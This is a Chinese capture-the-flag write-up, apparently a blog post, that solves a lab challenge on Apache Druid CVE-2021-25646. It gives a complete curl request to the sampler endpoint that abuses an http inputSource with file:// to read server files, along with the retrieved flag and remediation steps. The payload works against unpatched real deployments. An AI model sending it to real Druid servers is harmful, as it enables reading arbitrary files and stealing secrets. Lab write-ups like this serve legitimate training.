玄机靶场—Apache-druid(CVE-2021-25646) WP

YaBingSec2026-04-27 9:23

Apache-druid(CVE-2021-25646) 通关笔记

题目信息

  • 平台:玄机靶场
  • 题目 ID:197
  • 难度:简单
  • 积分:300 分
  • 类型:渗透
  • 漏洞编号:CVE-2021-25646

漏洞背景

Apache Druid 0.20.0 及以前版本中,/druid/indexer/v1/sampler 接口的 ioConfig.inputSource 支持多种数据源类型,包括 http 类型。该类型允许从指定 URI 拉取数据,而未对 file:// 协议进行限制,导致攻击者可以通过 file:///path/to/file 读取服务器本地任意文件。

虽然题目描述的是 JavaScript RCE(通过 javascript 类型的 filter/aggregator 执行任意 JS 代码),但本靶场环境中 JavaScript 功能被配置禁用(druid.javascript.enabled 未设置为 true),因此改用 http inputSource + file:// 协议实现任意文件读取。

靶机信息

  • IP:52.83.246.206
  • 端口:8888(Druid Router/Web Console)
  • 版本:Apache Druid 0.20.0

利用过程

步骤 1:确认服务版本

bash 复制代码 
curl -s "http://52.83.246.206:8888/status"

响应确认版本为 0.20.0,属于漏洞版本范围。

步骤 2:尝试 JavaScript RCE(失败)

通过 /druid/indexer/v1/sampler 发送包含 javascript 类型 filter 的 payload,服务器返回:

复制代码 
HTTP ERROR 500 java.lang.IllegalStateException: JavaScript is disabled

说明 druid.javascript.enabled 未启用,JavaScript 执行路径不可用。

步骤 3:改用 file:// 协议读取文件

利用 http 类型 inputSource 支持 file:// 协议的特性,直接读取 /flag.txt

bash 复制代码 
curl -s -X POST "http://52.83.246.206:8888/druid/indexer/v1/sampler" \
  -H "Content-Type: application/json" \
  -d '{
    "type": "index",
    "spec": {
      "type": "index",
      "ioConfig": {
        "type": "index",
        "inputSource": {
          "type": "http",
          "uris": ["file:///flag.txt"]
        },
        "inputFormat": {"type": "regex", "pattern": "(.*)", "columns": ["line"]}
      },
      "dataSchema": {
        "dataSource": "test",
        "timestampSpec": {"missingValue": "2021-01-01T00:00:00.000Z"},
        "dimensionsSpec": {"dimensions": ["line"]},
        "metricsSpec": [],
        "granularitySpec": {"type": "uniform", "segmentGranularity": "DAY", "queryGranularity": "NONE", "rollup": false}
      }
    },
    "samplerConfig": {"numRows": 10, "timeoutMs": 10000}
  }'

步骤 4:获取 FLAG

响应内容:

json 复制代码 
{"numRowsRead":1,"numRowsIndexed":1,"data":[{"input":{"line":"flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}"},"parsed":{"__time":1609459200000,"line":"flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}"}}]}

FLAGflag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}

Flag 汇总

步骤 内容 Flag
步骤1 读取 /flag.txt flag{b9b9dfac-6140-4de8-bf3d-4789ee0800cc}

修复建议

  1. 升级 Apache Druid 至 0.21.0 或更高版本。
  2. 若无法升级,在 common.runtime.properties 中确保 druid.javascript.enabled=false(默认值)。
  3. http 类型 inputSource 的 URI 进行白名单校验,禁止 file://jar:// 等本地协议。
  4. 部署网络访问控制,限制 Druid 管理端口(8888/8081/8090)的外部访问。
相关推荐
凉、介15 分钟前
Armv8-A virtualization 笔记 (二)
笔记·学习·嵌入式·arm·gic
智者知已应修善业1 小时前
【ICL8038芯片正弦波三角波方波发生器电路】2024-1-5
驱动开发·经验分享·笔记·硬件架构·硬件工程
踩着两条虫1 小时前
「AI + 低代码」的可视化设计器
开发语言·前端·低代码·设计模式·架构
JoneBB1 小时前
ABAP Webservice连接
运维·开发语言·数据库·学习
budingxiaomoli1 小时前
Spring IoC &DI
java·spring·ioc·di
Spider Cat 蜘蛛猫1 小时前
Springboot SSO系统设计文档
java·spring boot·后端
未若君雅裁2 小时前
MySQL高可用与扩展-主从复制读写分离分库分表
java·数据库·mysql
2601_957787582 小时前
企业级内容矩阵的安全合规体系构建与技术实现
大数据·安全·矩阵
探序基因2 小时前
身高与基因的关系
笔记
即使再小的船也能远航2 小时前
【Python】安装
开发语言·python
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03【AI】2026 年具身智能模型和世界模型总结04CC-Switch & Claude 基于 Linux 服务器安装使用指南05Codex 手机端连接教程:三分钟搞定,附完整步骤06Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓07人工智能最新动态 AI 日报 · 2026年5月10日08头歌软件工程导论UML画图题(基于starUML)09AI科技热点日报 | 2026年5月11日10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法